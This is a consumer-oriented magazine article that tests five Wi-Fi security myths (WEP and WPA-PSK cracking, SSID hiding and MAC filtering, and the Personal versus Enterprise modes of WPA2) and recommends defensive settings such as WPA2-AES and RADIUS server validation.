Busting (or Trusting) Wi-Fi Security Myths
We take a hard look at five bits of wireless security conventional wisdom and tell you which are true and which are bogus.
When youre reading up on Wi-Fi security, youll find many different interpretations and opinions. One might say disabling SSID broadcasting will hide your network, while others might say it just draws hackers into an easy job. Some might think WPA encryption is cracked, while others say its secure. Here we look at each myth and tell you whether it's verified--or busted.
Myth: WEP encryption can be cracked in minutes.
Verdict: Trusted. WEP encryption can be cracked in minutes.
After nearly a decade now, its no secret. The Wired Equivalent Privacy (WEP) encryption standard, developed by the IEEE, can be cracked. In some cases, it can even be cracked in minutes. So, count this myth as True.
Attacks on WEP result in the hacker recovering the encryption key. Then he or she can freely connect to the network, access network shares and resources, and decode all packets. Needless to say, WEP doesnt secure your network from hackers. It only protects you from the average Wi-Fi user.
To help come up with a secure encryption method, the Wi-Fi Alliance developed the Wi-Fi Protected Access (WPA) standard. Additionally, the IEEE formed another security standard, called 802.11i, which actually has been implemented as WPA2 by the Wi-Fi Alliance. (Well discuss more on these two WPA versions and their fate below.)
To address this problem, make sure you dont use WEP. As well discuss, try to use WPA2. You shouldnt have a problem with Wi-Fi products manufactured in 2003 or after. Older products might even support WPA/WPA2 after a simple firmware update. If all else fails, purchase newer equipment or replace them with a wired connection to the network.
Myth: WPA/WPA2-PSK encryption is also crackable.
Verdict: Trusted. Although it can still be secure with longer complex passphrases.
The Pre-Shared Keys (PSK) or passphrases used with WPA and WPA2 encryption can be cracked with off-line brute-force dictionary-based attacks. This means once a hacker captures the right packets of information from your Wi-Fi network, they can run it against a dictionary of words. Then if the passphrase youre using is in the dictionary, your encryption is cracked.
These dictionary attacks all depend upon the size and type of the dictionary used by the hacker. The bigger the dictionary, the better the chance he or she has of cracking your passphrase. Though bigger dictionaries can take longer to crack the passphrase, there are cracking services (such as WPA Cracker) that hackers can use to save time.
To make sure you arent susceptible to dictionary-based attacks, use longer, more complex, passphrases. Dont use real words; get creative and make it look like gibberish, like this example:
Remember, all businesses and organizations should use the Enterprise mode of WPA or WPA2 encryption, which uses 802.1X authentication instead of PSK.
There are other types of attacks developing on the first version of WPA (using TKIP-RC4 encryption), for both the Personal and Enterprise modes. To ensure long-term security, you should be using WPA2 (with AES-CCMP encryption). Most vendors have included support for this standard in their Wi-Fi gear since mid-2004. Even older equipment may be upgradeable via firmware updates.
Keep in mind, some wireless routers and access points allow you to select a WPA/WPA2 mixed mode where it accepts both standards. Even trickier, some let you select the underlying encryption method. You should use WPA2 only, and only with the AES-CCMP encryption method.
Myth: Disabling SSID broadcast, using static IPs, and enabling MAC address filtering protects you from hackers.
Verdict: Busted. Disabling SSID broadcast, using static IPs, and enabling MAC address filtering does not protect you from hackers.
When scouring the Net, youll find many sites recommending that you disable SSID broadcast, use static IPs, and enable MAC address filtering to protect yourself from hackers do these things to help secure your wireless network. Though these techniques protect you from the average Wi-Fi user, they wont stump a hacker. Therefore, well call this one out as False.
Disabling SSID broadcasting doesnt make your network name completely hidden. Disabling DHCP and using static IPs just means hackers will have to take a minute to assign themselves one. Lastly, MAC addresses can be easily spoofed, thus making filtering only a small fence that a hacker can leap over.
The only technique that really secures your Wi-Fi is to use encryption, preferably WPA2.
Myth: Personal mode of WPA/WPA2 is okay for small businesses or organizations.
Verdict: Busted. Personal mode of WPA/WPA2 is not okay for small businesses or organizations.
As you may know, there are two very different modes you can use with WPA and WPA2:
- Personal or Pre-Shared Key (PSK) mode
- Enterprise or 802.1X/RADIUS mode
The Personal mode is easier to setup on smaller networks and is great for home environments. However, despite popular belief, it should not be used by businesses or organizations, even small ones. Bustedthis myth is False.
Most say that the Personal mode is okay for small businesses (or any small network) because running the more secure Enterprise mode requires an external RADIUS server for the 802.1X authentication. However, these days there are lower cost servers (such as Elektron) targeted for smaller deployments and outsourced services (such as AuthenticateMyWiFi) that host the server for you.
Though running the Enterprise mode requires more money and effort, it better protects your network from misuse by employees and thieves. It gives you more control over who and what connects to the network.
For instance, users can log in to the Wi-Fi network with usernames and passwords you assign rather than input and store the actual encryption keys on their computers, which can be recovered by them or by thieves. When someone leaves the organization or loses their laptop, you can revoke their account or change their password. If you were using the Personal mode, youd have to change the WPA/WPA2 passphrase on all APs, computers, and devices.
Myth: Enterprise mode of WPA/WPA2 is vulnerable to attacks
Verdict: Trusted. Enterprise mode of WPA/WPA2 is vulnerable to attacks.
Its no question that the Enterprise mode of WPA and WPA2 provides better security than the Personal mode. However, this myth is True. The Enterprise mode is also vulnerable to attacks by hackers.
One particular man-in-the-middle attack is where a hacker would pose as a legitimate AP with a special RADIUS server, trying to divulge the users login credentials. However, you can protect yourself by validating the server. When configuring the PEAP or certificate settings in Windows on clients, there are three key settings:
- Check the Validate server certificate option and select the Trusted Root Certificate Authority from the list.
- Check the Connect to these servers option, and input the domain name or IP address of the RADIUS server.
- Check Do not prompt user to authorize new servers or trusted certificate authorities.
[Editor's note: Due to an oversight in the original version of this story, Myth #2 has been revised and updated.]
Eric Geier is the Founder and CEO of NoWiresSecurity, which helps businesses easily protect their Wi-Fi with enterprise-level encryption by offering an outsourced RADIUS/802.1X authentication service. He is also the author of many networking and computing books for brands like For Dummies and Cisco Press.